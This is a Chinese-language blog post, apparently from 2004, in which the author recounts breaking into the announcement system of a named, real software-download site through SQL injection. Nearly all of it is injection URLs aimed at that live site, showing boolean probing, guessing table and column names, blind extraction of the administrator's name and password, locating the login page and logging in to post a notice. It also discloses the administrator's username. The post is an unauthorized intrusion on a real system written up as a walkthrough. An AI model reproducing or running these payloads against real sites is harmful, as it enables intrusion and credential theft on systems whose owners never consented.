[原创]成功注入霏凡主站公告系统

最新推荐文章于 2024-10-16 17:36:30 发布

zhouzhen

最新推荐文章于 2024-10-16 17:36:30 发布

阅读量859

点赞数

分类专栏：网络安全文章标签：公告加密 user sql access 数据库

本文链接：https://blog.csdn.net/zhouzhen/article/details/134575

版权

网络安全专栏收录该内容

1 篇文章 0 订阅

订阅专栏

作为国内破解软件网站的代表，霏凡（http://www.crsky.net）由于安全的问题，论坛已经关闭了一段时间了。今天无意去霏凡主站，哈哈，，公告系统居然又sql注入漏洞，，于是就又了下面一篇文章。。。

开始用

http://www.crsky.net/zhnew/show.asp?id=26 and 1＝1 试了一下
发现没报错。哈哈。有希望。。

http://www.crsky.net/zhnew/show.asp?id=26 and 1＝2
出错了，看来存在sql注入漏洞。。

首先要判断数据库类型

提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(*) from sysobjects)>;0
出错了。。

估计就是 Access了

接下来猜表名。。

提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(*) from admin)>;=0
哈哈。。返回正常。。。。一下子就拿到了一个表名。。

然后就要猜用户名的字段了。

提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(user) from admin)>;=0
错了，看来没有user这个字段。

在试 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(username) from admin)>;=0
晕，还是不对。。

。。。。。。。。

终于 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(name) from admin)>;=0
返回正常了。。。我们又得到了一个用户名字段name

在往后就要猜密码的字段了。

提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(password) from admin)>;=0
错了，，，接着猜。。

。。。。。。。。。。。。。

终于 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(pwd) from admin)>;=0
哈哈，正常了。。。

我们又得到了一个密码的字段pwd

晕。。真累。。喝口水先。

要猜用户名了。。

先猜用户名的长度。

提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(name) from admin)>;2 返回正常
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(name) from admin)>;4 出错
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(name) from admin)>;3 正常

得出，用户名长度为4。先不管他密码加密没加密。。拿到用户名再说

猜用户名第一位。。

http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 asc(mid(name, 1, 1)) from admin)>;0 出错了
http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 asc(mid(name, 1, 1)) from admin)<;128 返回正常
http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 asc(mid(name, 1, 1)) from admin)>;1 出错了！！！

看来asc码为负数，是中文。。。
。。。。。。。。。

猜得用户名：逃学小龙

猜密码。。

先猜密码的长度。

提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(pwd) from admin)>;2 返回正常
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(pwd) from admin)>;4 出错
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(pwd) from admin)>;3 正常

密码的长度也为4。哈哈。。。会不会和用户名一样呢。。。

不管，还不知道管理员入口呢。。。

猜猜看。。
http://www.crsky.net/zhnew/index.asp 不对
。。。。。。

http://www.crsky.net/zhnew/login.asp 找到了。。

把用户名和密码都用逃学小龙试试。。。

成功了！！！！！！

发了个公告。提醒站长一下。。见 http://www.crsky.net/zhnew/show.asp?id=31

累了。。睡觉去。。。

2004 .8